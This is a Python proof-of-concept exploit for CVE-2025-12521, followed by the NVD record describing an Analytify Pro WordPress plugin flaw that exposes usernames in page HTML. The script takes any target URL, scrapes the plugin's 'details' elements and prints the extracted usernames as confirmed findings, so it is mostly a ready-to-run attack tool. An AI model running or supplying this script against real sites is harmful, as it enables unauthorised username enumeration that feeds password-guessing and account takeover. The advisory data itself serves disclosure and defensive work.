CVE-2025-12521

#!/usr/bin/env python3 """ CVE-2025-12521 PoC - Analytify Pro Sensitive Information Exposure This script demonstrates how an unauthenticated attacker can extract usernames from the Analytify Tag HTML details on WordPress pages. """ import requests from bs4 import BeautifulSoup import re import sys def extract_usernames(url): """ Extract usernames from Analytify Tag HTML details """ try: response = requests.get(url, timeout=10) if response.status_code != 200: print(f"[-] Failed to access {url}") return [] soup = BeautifulSoup(response.text, 'html.parser') usernames = [] # Find Analytify Tag details elements details_elements = soup.find_all('details') for details in details_elements: if 'analytify' in str(details).lower(): # Extract text content from details elements text_content = details.get_text(separator=' ', strip=True) # Look for username patterns username_pattern = re.findall(r'username[:\s]+([a-zA-Z0-9_-]+)', text_content, re.IGNORECASE) usernames.extend(username_pattern) return list(set(usernames)) except Exception as e: print(f"[-] Error: {e}") return [] def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-12521-poc.py <target_url>") print("Example: python cve-2025-12521-poc.py https://example.com") sys.exit(1) target_url = sys.argv[1] print(f"[*] Scanning {target_url} for CVE-2025-12521...") print(f"[*] Target: Analytify Pro plugin sensitive information exposure") usernames = extract_usernames(target_url) if usernames: print(f"[+] Found {len(usernames)} username(s):") for username in usernames: print(f" - {username}") print("[+] Vulnerability confirmed!") else: print("[-] No usernames found or target not vulnerable") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12521", "sourceIdentifier": "[email protected]", "published": "2025-10-31T14:16:12.487", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Analytify Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.0.3 via the Analytify Tag HTML details. This makes it possible for unauthenticated attackers to extract usernames from source code. While we generally do not assign CVE IDs to username exposure issues, this vendor has specifically requested we consider it a vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://analytify.io/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f57e90-94c9-4c9c-8700-bf591f6539ec?source=cve", "source": "[email protected]"}]}}